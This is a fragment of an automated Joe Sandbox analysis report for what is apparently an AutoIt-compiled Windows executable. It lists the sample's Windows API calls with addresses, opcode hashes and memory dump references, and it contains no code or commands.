                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9848e403a11adf3a78c2f5b6ca5b389059e4ad275e83f3671eda0e74e8a83f99
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94418E66C10359B6CB10EBF5C8469CFB3ECAF04310F5099A6E608F3261FA74E650C7A5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00F23DA1
                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F23DCB
                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00F23E80
                                                                                                                                                                                                                                                        • Part of subcall function 00F23D72: RegCloseKey.ADVAPI32(?), ref: 00F23DE8
                                                                                                                                                                                                                                                        • Part of subcall function 00F23D72: FreeLibrary.KERNEL32(?), ref: 00F23E3A
                                                                                                                                                                                                                                                        • Part of subcall function 00F23D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F23E5D
                                                                                                                                                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F23E25
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 395352322-0
                                                                                                                                                                                                                                                      • Opcode ID: 87a899cca8084ee44e62d95821580262affd81a95179cfb175aa5c9675ef85c9
                                                                                                                                                                                                                                                      • Instruction ID: e61bb4b038a0e318bbe94d8e05464c57968a6f2431fed5778cef090f558773f2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 87a899cca8084ee44e62d95821580262affd81a95179cfb175aa5c9675ef85c9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1311CB5D01119BFDB159F94EC85AFFB7BCEF19310F00016AE912E2150D678AF49ABA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F28FE7
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(0113E5D8,000000F0), ref: 00F2901A
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(0113E5D8,000000F0), ref: 00F2904F
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F29081
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F290AB
                                                                                                                                                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00F290BC
                                                                                                                                                                                                                                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F290D6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2178440468-0
                                                                                                                                                                                                                                                      • Opcode ID: c8232e6ed4697a857bf92b5adbf52b06f7b908466eae389a62a8d06d5b37af57
                                                                                                                                                                                                                                                      • Instruction ID: b41ccc4d5c808f9211155968c298a9c0693d0a9bf0f1d2e805e8620fa98fd72a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8232e6ed4697a857bf92b5adbf52b06f7b908466eae389a62a8d06d5b37af57
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A313D35A04129DFDB20CF68EC85F6437A5FB5A724F150264F9558B2B1CBB1A841EB41
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F008F2
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F00918
                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00F0091B
                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00F00939
                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 00F00942
                                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00F00967
                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00F00975
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                                                                      • Opcode ID: ce1d618ac82b47de467761dd86e22e035ee0371f975d6b92adf835292525ca6d
                                                                                                                                                                                                                                                      • Instruction ID: 81e4073f96f7572e637586cdba495229caf82cef2e63360ddb08194e89371aa4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce1d618ac82b47de467761dd86e22e035ee0371f975d6b92adf835292525ca6d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45215676601219AFEB10DF68DC84EAB73ECEF19370B048125FD19DB291DA74EC45A760
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __wcsnicmp
                                                                                                                                                                                                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                                                                                                      • API String ID: 1038674560-2734436370
                                                                                                                                                                                                                                                      • Opcode ID: b25898f11e8cf2d21c85b81e1f139e5e72cad63a5254acc2a70c7e8f50ea81c8
                                                                                                                                                                                                                                                      • Instruction ID: 4f32cd989ac8ca9675e38958e2d31f35d7c6e3ea75e8b12f4af559d7466e79f4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b25898f11e8cf2d21c85b81e1f139e5e72cad63a5254acc2a70c7e8f50ea81c8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7213A3250455167C225EA249C1AF7BB3D8EF65310F64402AF946A71C2E7619982F3B9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F009CB
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F009F1
                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(00000000), ref: 00F009F4
                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32 ref: 00F00A15
                                                                                                                                                                                                                                                      • SysFreeString.OLEAUT32 ref: 00F00A1E
                                                                                                                                                                                                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 00F00A38
                                                                                                                                                                                                                                                      • SysAllocString.OLEAUT32(?), ref: 00F00A46
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3761583154-0
                                                                                                                                                                                                                                                      • Opcode ID: adbbf06abb1c0b5aa862d6ddb676140ba7f7d247316d906feae693f7ef545506
                                                                                                                                                                                                                                                      • Instruction ID: 99bfa2aea60df9261ec4b085fe5ded9f1762d34664383a7a19d9df47875a440c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: adbbf06abb1c0b5aa862d6ddb676140ba7f7d247316d906feae693f7ef545506
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2215879701204AFDB10DFA8DC89E6A77ECEF59370B448125F909CB2A1DA74EC41A754
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDD17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EDD1BA
                                                                                                                                                                                                                                                        • Part of subcall function 00EDD17C: GetStockObject.GDI32(00000011), ref: 00EDD1CE
                                                                                                                                                                                                                                                        • Part of subcall function 00EDD17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00EDD1D8
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F2A32D
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F2A33A
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F2A345
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F2A354
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F2A360
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                                      • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                      • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                                      • Opcode ID: c101a7a4f741a9591f02542066c3bf91fb54a38abe326c8062222af03f398da0
                                                                                                                                                                                                                                                      • Instruction ID: 7ce3ea16560c26d17111f356e147e9913a87cf1e93353d7d8fb47b58c697a064
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c101a7a4f741a9591f02542066c3bf91fb54a38abe326c8062222af03f398da0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1F1181B1550129BEEB119FA4DC85EE77F6DFF09798F014115BA08A60A0C7729C21EBA4
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00EDCCF6
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EDCD37
                                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00EDCD5F
                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00EDCE8C
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00EDCEA5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1296646539-0
                                                                                                                                                                                                                                                      • Opcode ID: a40a5d981d18ed3a01f366cd3ccda619b025427c58b2e05411dcbc45f12984a5
                                                                                                                                                                                                                                                      • Instruction ID: 0ab6bf12b0c02c3e333ce12e301483f5784ff61a2b7656cbaf14ba733c4e15b7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a40a5d981d18ed3a01f366cd3ccda619b025427c58b2e05411dcbc45f12984a5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6B159B990024ADBDF14CFA8C5807EDBBB1FF08354F24912AEC59AB350DB30A951DB64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00F21C18
                                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00F21C26
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 00F21C54
                                                                                                                                                                                                                                                        • Part of subcall function 00EE1DFC: __wsplitpath_helper.LIBCMT ref: 00EE1E3C
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 00F21C69
                                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00F21CDF
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00F21CF1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1380811348-0
                                                                                                                                                                                                                                                      • Opcode ID: 69f92436a826c49d52bd5b33f8aae2de30a85d52765987b7f8d7fae57be3db24
                                                                                                                                                                                                                                                      • Instruction ID: c79c7dfc20ea1405637ec1bafafbe28347ff26717320a662cf776a6a785f6429
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 69f92436a826c49d52bd5b33f8aae2de30a85d52765987b7f8d7fae57be3db24
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26518D71504344AFD320EF64D885EABB7E8EF88754F00491EF989A7251EB30AA05CB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00F23C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F22BB5,?,?), ref: 00F23C1D
                                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F230AF
                                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F230EF
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F23112
                                                                                                                                                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F2313B
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F2317E
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00F2318B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3451389628-0
                                                                                                                                                                                                                                                      • Opcode ID: 23294c45e8f67a86016e44594e8b8a681bb0483c8bff90b4d0ddb0c7478cd44a
                                                                                                                                                                                                                                                      • Instruction ID: c6be9318c004d1f7dd44e4fca4c522d98e371b2759eb5c23b41638a40ccac7db
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23294c45e8f67a86016e44594e8b8a681bb0483c8bff90b4d0ddb0c7478cd44a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB518871608300AFC700EF68CD81E6ABBE9FF89310F04491DF545972A1DB36EA06EB52
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetMenu.USER32(?), ref: 00F28540
                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 00F28577
                                                                                                                                                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F2859F
                                                                                                                                                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 00F2860E
                                                                                                                                                                                                                                                      • GetSubMenu.USER32(?,?), ref: 00F2861C
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00F2866D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 650687236-0
                                                                                                                                                                                                                                                      • Opcode ID: c99ad698be0e2c0e8746d4fb7be961fbdd53b6ad8915908e7167d3360ed91743
                                                                                                                                                                                                                                                      • Instruction ID: f5bcebc055c70f8f374bb51386fff76a723c4f9a3ea16f36bdd78ce2135c5944
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c99ad698be0e2c0e8746d4fb7be961fbdd53b6ad8915908e7167d3360ed91743
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B851E375E01229AFCF11EF54C941AAEBBF4FF48360F144059E905B7391CB74AE429B90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F04B10
                                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F04B5B
                                                                                                                                                                                                                                                      • IsMenu.USER32(00000000), ref: 00F04B7B
                                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 00F04BAF
                                                                                                                                                                                                                                                      • GetMenuItemCount.USER32(000000FF), ref: 00F04C0D
                                                                                                                                                                                                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00F04C3E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3311875123-0
                                                                                                                                                                                                                                                      • Opcode ID: 8d0194d100e687e1da6e76a613c8d5a70b4c3658b011401d94d01fb0a21b77f4
                                                                                                                                                                                                                                                      • Instruction ID: a5b450e6724fb5d643ac3e702049953b7a29756ed10fa09b940d38c7ad3b0118
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8d0194d100e687e1da6e76a613c8d5a70b4c3658b011401d94d01fb0a21b77f4
